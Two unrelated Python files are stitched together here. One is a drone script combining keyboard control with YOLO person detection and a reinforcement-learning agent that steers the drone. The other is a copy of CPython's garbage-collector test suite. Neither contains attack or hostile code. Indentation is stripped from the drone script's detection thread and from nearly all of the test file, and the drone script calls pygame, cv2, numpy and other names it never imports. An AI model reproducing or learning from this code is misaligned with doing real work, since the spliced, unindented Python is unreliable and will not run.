from mydronesdk.ddpg_yolo_control.yolo.bbox import draw_boxes
from keras.models import load_model
import json
from mydronesdk.ddpg_yolo_control.rl_airsim.gym_airsim_env import AirsimEnv
from mydronesdk.ddpg_yolo_control.rl_airsim.ddpg_train import RLAgent
import threading
import copy
from mydronesdk.my_drone_sdk import MyDroneSDK
import sys
# Speed of the drone (keyboard-controlled velocity magnitude)
S = 0.4
# Frames per second of the pygame window display
# A low number also results in input lag, as input information is processed once per frame.
FPS = 15

###############################
# Set some parameter
###############################
# YOLO network input size.
net_h, net_w = 416, 416  # 416, 416 # a multiple of 32, the smaller the faster
# YOLO objectness and non-max-suppression thresholds.
obj_thresh, nms_thresh = 0.6, 0.45
# Display/recording frame geometry (frames are resized to width x height).
frame_height, frame_width, frame_channel = 720, 960, 3
# Altitude bounds -- units not shown here; TODO confirm against controller.
z_lower, z_upper = 0, 1200
# Presumably seconds per control step -- unused in the visible code; verify.
step_duration = 2
# Suffix used in the recorded output*.avi file names.
save_id = 1
# Velocity scaling factors -- not referenced in the visible code; confirm
# they are consumed by the autonomous-control path.
vel_scale = 0.55
left_right_velocity_rate = 1  # 0.8
forward_backward_velocity_rate = 1
up_down_velocity_rate = 0.6
yaw_velocity_rate = 70
class FrontEnd:
    """ Maintains the Tello display and moves it through the keyboard keys.
        Press escape key to quit.
        The controls are:
            - T: Takeoff
            - L: Land
            - Arrow keys: Forward, backward, left and right.
            - A and D: Counter clockwise and clockwise rotations (yaw)
            - W and S: Up and down.
            - P: prepare the drone (enables RC control)
            - Space: toggle between manual and non-manual mode
    """

    def __init__(self,drone):
        # Init pygame
        pygame.init()

        # Create pygame window sized to the video frame
        pygame.display.set_caption("Tello video stream")
        self.screen = pygame.display.set_mode([frame_width, frame_height])

        # Init Tello object that interacts with the Tello drone
        self.drone = drone

        # Drone velocities between -100~100
        self.for_back_velocity = 0
        self.left_right_velocity = 0
        self.up_down_velocity = 0
        self.yaw_velocity = 0
        # self.speed = 10

        # RC commands are only forwarded after takeoff/prepare.
        self.send_rc_control = False
        self.should_stop=False
        # True: keyboard control; False: toggled off with Space.
        self.manual_flag=True

        # create update timer: fires USEREVENT+1 every 1000//FPS ms, which
        # triggers update() to send the current velocities to the drone.
        pygame.time.set_timer(pygame.USEREVENT + 1, 1000 // FPS)

    def run(self):
        """Main loop: handle input events, record and display the video feed."""
        fourcc = cv2.VideoWriter_fourcc(*'XVID')
        out = cv2.VideoWriter(f'D:\PYCHARMWORKSPACE\PyOneDark_Qt_Widgets_Modern_GUI-master\property/output{save_id}.avi', fourcc, FPS, (frame_width, frame_height))
        frame_read = self.drone.video_receiver

        while not self.should_stop:

            for event in pygame.event.get():
                if self.manual_flag:
                    if event.type == pygame.USEREVENT + 1:
                        self.update()
                    elif event.type == pygame.QUIT:
                        self.should_stop = True
                    elif event.type == pygame.KEYDOWN:
                        if event.key == pygame.K_ESCAPE:
                            self.should_stop = True
                        elif event.key == pygame.K_SPACE:
                            self.manual_flag=False
                        else:
                            self.keydown(event.key)
                    elif event.type == pygame.KEYUP:
                        self.keyup(event.key)
                else:
                    # Non-manual mode: only Space (back to manual) is handled.
                    if event.type == pygame.KEYDOWN:
                        if event.key == pygame.K_SPACE:
                            self.manual_flag = True

            # assumes status == 2 means a frame is available -- TODO confirm
            # against the video_receiver implementation.
            if frame_read.status!=2:
                continue

            self.screen.fill([0, 0, 0])

            try:
                frame = cv2.resize(frame_read.frame,(frame_width,frame_height))
            except BaseException as e:
                # Frame may be momentarily missing/corrupt; skip this cycle.
                continue
            out.write(frame)
            # text = "Battery: {}%".format(self.tello.get_battery())
            # cv2.putText(frame, text, (5, 720 - 5),
            # cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)

            # Convert BGR->RGB and reorient for pygame's surface coordinates.
            frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            frame = np.rot90(frame)
            frame = np.flipud(frame)

            frame = pygame.surfarray.make_surface(frame)
            self.screen.blit(frame, (0, 0))
            pygame.display.update()

            time.sleep(1 / FPS)

        # Call it always before finishing. To deallocate resources.
        out.release()
        pygame.quit()
        print("ddpg_yolo_control_script ended.")

    def keydown(self, key):
        """ Update velocities based on key pressed
        Arguments:
            key: pygame key
        """
        if key == pygame.K_UP:  # set forward velocity
            self.for_back_velocity = S
        elif key == pygame.K_DOWN:  # set backward velocity
            self.for_back_velocity = -S
        elif key == pygame.K_LEFT:  # set left velocity
            self.left_right_velocity = -S
        elif key == pygame.K_RIGHT:  # set right velocity
            self.left_right_velocity = S
        elif key == pygame.K_w:  # set up velocity
            self.up_down_velocity = S
        elif key == pygame.K_s:  # set down velocity
            self.up_down_velocity = -S
        elif key == pygame.K_a:  # set yaw counter clockwise velocity
            self.yaw_velocity = -S*50
        elif key == pygame.K_d:  # set yaw clockwise velocity
            self.yaw_velocity = S*50
        # elif key == pygame.K_h: # set yaw clockwise velocity
        #     print(self.tello.get_height())

    def keyup(self, key):
        """ Update velocities based on key released
        Arguments:
            key: pygame key
        """
        if key == pygame.K_UP or key == pygame.K_DOWN:  # set zero forward/backward velocity
            self.for_back_velocity = 0
        elif key == pygame.K_LEFT or key == pygame.K_RIGHT:  # set zero left/right velocity
            self.left_right_velocity = 0
        elif key == pygame.K_w or key == pygame.K_s:  # set zero up/down velocity
            self.up_down_velocity = 0
        elif key == pygame.K_a or key == pygame.K_d:  # set zero yaw velocity
            self.yaw_velocity = 0
        elif key == pygame.K_t:  # takeoff
            self.drone.takeoff()
            self.send_rc_control = True
        elif key == pygame.K_l:  # land
            self.drone.land()
            self.send_rc_control = False
        elif key == pygame.K_p:  # prepare
            try:
                self.drone.prepare()
            except Exception as e:
                # NOTE(review): errors from prepare() are swallowed and RC
                # control is enabled regardless -- confirm this is intended.
                pass
            #else:
            self.send_rc_control = True

    def update(self):
        """ Update routine. Send velocities to Tello."""
        if self.send_rc_control:
            # self.tello.send_rc_control(self.left_right_velocity, self.for_back_velocity,
            #     self.up_down_velocity, self.yaw_velocity)
            self.drone.set_velocity_body(self.left_right_velocity, self.for_back_velocity,
                self.up_down_velocity, self.yaw_velocity)
def box_thread(drone,front_end,target_id=14):
"""box detection thread function. This function receives a frame every 200ms and return corresponding box and actions in a queue
input : frame_glob (416x416)
output : put box and actions in queue.
"""
# setting config path for YOLO config
config_path = 'D:\PYCHARMWORKSPACE\PyOneDark_Qt_Widgets_Modern_GUI-master\mydronesdk/ddpg_yolo_control/yolo_assets/config_voc.json'
with open(config_path) as config_buffer:
config = json.load(config_buffer)
###############################
# Load the model for YOLO detection
###############################
os.environ['CUDA_VISIBLE_DEVICES'] = config['train']['gpus']
infer_model = load_model(config['train']['saved_weights_name'])
###############################
# Load the model for RL agent
###############################
env = AirsimEnv(False, sim_flag=False)
agent = RLAgent(env)
ENV_NAME = 'drone'
agent.agent.load_weights('D:/PYCHARMWORKSPACE/PyOneDark_Qt_Widgets_Modern_GUI-master/mydronesdk/ddpg_yolo_control/rl_airsim/ddpg_{}_weights_5.h5f'.format(ENV_NAME))
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(f'D:\PYCHARMWORKSPACE\PyOneDark_Qt_Widgets_Modern_GUI-master\property/output_box{save_id}.avi', fourcc, 2, (frame_width, frame_height))
print('YOLO detection ok')
while not front_end.should_stop:
try:
frame_glob=drone.video_receiver.frame
if frame_glob is not None:
frame = cv2.resize(frame_glob,(frame_width,frame_height))
# call prection function of YOLO algorithm to return boxes
boxes = \
get_yolo_boxes(infer_model, [frame],
net_h, net_w, config['model']['anchors'], obj_thresh, nms_thresh)[0]
# print('YOLO detection ok')
state = np.zeros(5)
for box in boxes:
if box.get_label() == target_id: # filter on the person class (ID =14)
print("reward:", env.reward([box.xmin, box.xmax, box.ymin, box.ymax]))
state = np.array([box.xmin / frame_width, box.xmax / frame_width,
box.ymin / frame_height, box.ymax / frame_height, 0])
draw_boxes(frame, [box], config['model']['labels'], obj_thresh)
break
# frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# frame = np.rot90(frame)
# frame = np.flipud(frame)
cv2.imshow("show", frame)
cv2.waitKey(1)
# state[4]=(tello.get_height()-z_lower) / (z_upper - z_lower)
state[4] = (300 - z_lower) / (z_upper - z_lower)
action = agent.agent.my_forward_for_test(state) * vel_scale
#print("action:", action)
left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity = action
# tello.send_rc_control(round(-left_right_velocity*left_right_velocity_rate),
# round(forward_backward_velocity*forward_backward_velocity_rate),
# round(up_down_velocity *up_down_velocity_rate),
# round(yaw_velocity / vel_scale * yaw_velocity_rate))
if not front_end.manual_flag:
drone.set_velocity_body(-left_right_velocity*left_right_velocity_rate,
forward_backward_velocity*forward_backward_velocity_rate,
up_down_velocity *up_down_velocity_rate,
yaw_velocity / vel_scale * yaw_velocity_rate)
timer = time.time()
text = f"{-left_right_velocity * left_right_velocity_rate}, " \
f"{forward_backward_velocity * forward_backward_velocity_rate}, " \
f"{up_down_velocity * up_down_velocity_rate}, {yaw_velocity / vel_scale * yaw_velocity_rate}"
cv2.putText(frame, text, (50, 720 - 5),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
out.write(frame)
while time.time() - timer < step_duration and not front_end.manual_flag:
time.sleep(1 / FPS)
# tello.send_rc_control(0, 0, 0, 0)
if not front_end.manual_flag:
drone.set_velocity_body(0,0,0,0)
#frame_glob = None
except Exception as e:
# print("Exception: "+e.__str__())
pass
out.release()
print("box_thread ended.")
def script(command_sender,video_receiver):
drone=MyDroneSDK("1",command_sender, video_receiver)
frontend = FrontEnd(drone)
thread_box = threading.Thread(target=box_thread, args=(drone,frontend,1))
# thread_box.setDaemon(True)
thread_box.start()
# time.sleep(5)
# run frontend
frontend.run()
if __name__=="__main__":
pass |
test_gc.py | import unittest
from test.support import (verbose, refcount_test, run_unittest,
strip_python_stderr)
import sys
import time
import gc
import weakref
try:
import threading
except ImportError:
threading = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
class Uncollectable(object):
"""Create a reference cycle with multiple __del__ methods.
An object in a reference cycle will never have zero references,
and so must be garbage collected. If one or more objects in the
cycle have __del__ methods, the gc refuses to guess an order,
and leaves the cycle uncollected."""
def __init__(self, partner=None):
if partner is None:
self.partner = Uncollectable(partner=self)
else:
self.partner = partner
def __del__(self):
pass
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = False
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
for t in threads:
t.start()
time.sleep(1.0)
exit = True
for t in threads:
t.join()
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncolectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
